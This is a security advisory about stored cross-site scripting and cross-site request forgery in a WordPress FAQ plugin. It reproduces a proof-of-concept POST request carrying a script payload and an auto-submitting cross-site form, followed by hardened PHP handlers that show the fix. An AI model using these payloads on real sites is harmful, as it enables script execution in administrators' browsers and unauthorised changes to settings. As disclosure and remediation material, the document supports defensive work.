WordPress FAQs Manager Plugin Cross-Site Scripting and Cross-Site Request Forgery Vulnerabilities (2)


 ####################################################################
 #### Request from Ask Question area (XSS in question parameter) ####
 ####################################################################
 POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
 Host: 127.0.0.1:9001
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
 Accept: application/json, text/javascript, */*; q=0.01
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Referer: ?p=11
 Content-Length: 143
 Connection: keep-alive
 Pragma: no-cache
 Cache-Control: no-cache

group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=lalalallala%40gmail.com&question=XSS+TEST+<script>alert(1)</script>%3F&captcha_code=8560

# The captured request carries no session cookie: anyone who can reach the public Ask Question form can submit it. When an admin later opens the Questions area in the back end, the stored question is rendered unescaped and the payload executes as arbitrary JavaScript in the admin's browser.

#######################################################################
 -->
 <html>
 <head>
    <title>
        #####################################################
        ############## IndiaNIC FAQ 1.0 CSRF ################
        #####################################################
    </title>
 </head>
 <body>

<!-- replace "http://www.example.com/wordpress" with the target site -->
<!-- note: as reproduced on this page the hidden inputs carry no name attributes, so the parameter names the original PoC posted are not recoverable here; only the first value, "inic_faq_settings", is clearly the admin-ajax.php action parameter (compare action=inic_faq_questions in the XSS request above) -->
    <form action="http://www.example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" value="inic_faq_settings" />
    <input type="hidden" value="m3tamantra@127.0.0.1" />
    <input type="hidden" value="1" />
    <input type="hidden" value="1" />
    <input type="hidden" value="lalalalalalalalalalalalal" />
    <input type="hidden" value="babaaaaaammmmmmmm" />
    <input type="hidden" value="alert(1234)" />
    </form>
    <script>document.forms[0].submit();</script>

</body>
 </html>
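Both PoCs above come down to the same two missing controls: the settings action accepts any POST that arrives in a logged-in admin's browser (no nonce, so the cross-site form works), and the stored question is echoed into the back end without escaping (so the script tag runs). The following is an added example of how a WordPress plugin closes both holes, not IndiaNIC's code and not the actual fix. Only the action names inic_faq_questions and inic_faq_settings and the parameters group_id, who_asked and question are taken from the requests on this page; the function names, option keys, the admin_email setting and the nonce action name are assumptions.

```php
<?php
/**
 * Added example: hardened sketch of the two admin-ajax.php handlers the
 * advisory exercises. Not IndiaNIC's code. Action names and the POST
 * parameters group_id / who_asked / question come from the captured
 * requests; function names, option keys and the nonce action are assumed.
 */

// 1. Public "ask a question" endpoint. wp_ajax_nopriv_* runs for visitors
//    who are not logged in, so no session is needed to reach it: whatever
//    is stored here is later rendered inside the admin's browser.
add_action( 'wp_ajax_inic_faq_questions', 'hardened_faq_ask_question' );
add_action( 'wp_ajax_nopriv_inic_faq_questions', 'hardened_faq_ask_question' );

function hardened_faq_ask_question() {
	// Sanitise on input: sanitize_text_field() strips tags, so the
	// "<script>alert(1)</script>" from the captured request never reaches storage.
	$question  = sanitize_text_field( wp_unslash( $_POST['question'] ?? '' ) );
	$who_asked = sanitize_email( wp_unslash( $_POST['who_asked'] ?? '' ) );
	$group_id  = absint( $_POST['group_id'] ?? 0 );

	if ( '' === $question || ! is_email( $who_asked ) || 0 === $group_id ) {
		wp_send_json_error( array( 'message' => 'invalid input' ), 400 ); // calls wp_die()
	}

	// Storage backend is assumed (a plain option); the point is what gets written.
	$pending   = get_option( 'hardened_faq_pending', array() );
	$pending[] = array( 'group_id' => $group_id, 'who_asked' => $who_asked, 'question' => $question );
	update_option( 'hardened_faq_pending', $pending );

	wp_send_json_success( array( 'message' => 'question received' ) );
}

// 2. Back-end listing. Escape on output regardless of what input filtering
//    did: esc_html() turns "<" into "&lt;", so a payload that slipped past
//    (or predates) the input filter renders as text, not markup.
function hardened_faq_render_pending() {
	foreach ( get_option( 'hardened_faq_pending', array() ) as $row ) {
		printf(
			'<tr><td>%d</td><td>%s</td><td>%s</td></tr>',
			(int) $row['group_id'],
			esc_html( $row['who_asked'] ),
			esc_html( $row['question'] )
		);
	}
}

// 3. Settings endpoint. Logged-in users only (no nopriv hook), admins only,
//    and only with a nonce bound to this user and this action. A cross-site
//    form like the CSRF PoC above cannot read the nonce, so the request dies
//    before any setting is touched.
add_action( 'wp_ajax_inic_faq_settings', 'hardened_faq_save_settings' );

function hardened_faq_save_settings() {
	check_ajax_referer( 'hardened_faq_settings', '_ajax_nonce' ); // wp_die()s on a missing or stale nonce
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
	}

	$settings = array(
		'admin_email' => sanitize_email( wp_unslash( $_POST['admin_email'] ?? '' ) ),
		// Deliberately no free-form script/HTML setting: the PoC's "alert(1234)"
		// value shows why a setting echoed into pages must never accept raw code.
	);
	update_option( 'hardened_faq_settings', $settings );
	wp_send_json_success();
}

// 4. The settings page itself. wp_nonce_field() emits the hidden _ajax_nonce
//    input that the legitimate client posts with the rest of the form (for
//    example via jQuery's serialize()); this is the value the attacker lacks.
function hardened_faq_render_settings_form() {
	$settings = get_option( 'hardened_faq_settings', array( 'admin_email' => '' ) );
	echo '<form id="hardened-faq-settings" method="post" action="' . esc_url( admin_url( 'admin-ajax.php' ) ) . '">';
	echo '<input type="hidden" name="action" value="inic_faq_settings" />';
	wp_nonce_field( 'hardened_faq_settings', '_ajax_nonce' );
	echo '<input type="email" name="admin_email" value="' . esc_attr( $settings['admin_email'] ) . '" />';
	echo '<button type="submit">Save</button>';
	echo '</form>';
}
```

Dropped into a plugin or mu-plugin file, this replaces the unauthenticated settings write with a nonce-and-capability check and makes the question listing safe even for rows stored before the fix, because escaping happens at render time. The nonce check alone does not protect the public question endpoint (it is meant to be reachable without login), which is why the XSS side is fixed by sanitising on input and escaping on output rather than by adding a token.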

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
 
WordPress
 ---------
 At the time of writing the vendor has not released a patch or upgrade; users of this software are advised to watch the vendor's homepage for the latest version:
 

Content copyright notice: unless otherwise stated, all articles are original to this site.

Reprints must credit the source: http://127.0.0.1/wyyjps.html